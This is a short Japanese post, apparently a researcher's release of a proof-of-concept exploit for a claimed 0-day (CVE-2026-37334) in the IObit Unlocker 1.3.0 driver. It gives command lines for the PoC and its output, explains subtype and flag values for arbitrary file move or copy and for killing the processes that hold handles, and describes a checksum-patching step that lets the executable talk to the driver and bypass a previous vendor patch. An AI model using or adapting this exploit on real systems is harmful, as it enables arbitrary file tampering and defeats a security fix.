
(0 day) CVE-2026-37334 任意ファイルの移動またはコピー。チェックサムのトリックにより以前のパッチを回避。IObit Unlocker v. 1.3.0
(0day) 任意のファイルを移動またはコピーします。チェックサムのトリックにより、以前のパッチを回避します。
解説: https://nathan2.com/files/iobit.pdf 全体情報: https://nathan2.com/posts/iobit/
私は、この脆弱性が以前に別のエクスプロイトとして発見されていたことを知らずに発見しました。ただし、これはIObitが施したパッチを回避するものです。バージョン1.3.0で動作します。
使用方法:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- リクエスト送信 ---
ソース: C:\copied.txt
宛先: C:\t.txt
サブタイプ: 4 | フラグ: 1
IOCTL成功。ドライバーが4バイトを返しました。
検証: 対象ファイルが存在/アクセス可能です。
その他のフラグ:
使用方法: UnlockerCLI.exe <ソースパス> <宛先パス> <サブタイプ> <フラグ>
例: UnlockerCLI.exe "C:\Path With Space\file.txt" "C:\backup\file.txt" 3 (サブタイプ) 5 (操作フラグ)
サブタイプ: (少なくとも私が使用するもの) 3=移動, 4=コピー
操作フラグ: 0=ハンドルを削除しない, 1=ハンドルを削除, 2=ハンドルを持つプロセスを強制終了, 4=プロセスを強制終了してハンドルを削除, 5??? 実験用。
添付の実行ファイルは機能し、すでにパッチが適用されているはずです。適用されていない場合は、以下をお読みください。
チェックサムパッチャーを使用してPoCにパッチを適用してください。次のように:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
元のファイルサイズ: 235449 バイト
現在の交互合計: 11044471
現在のXOR合計: 43
ファイルはすでに正しいチェックサムを持っています。変更は不要です。
これにより、実行ファイルがIObitUnlockerドライバーと通信できるようになります。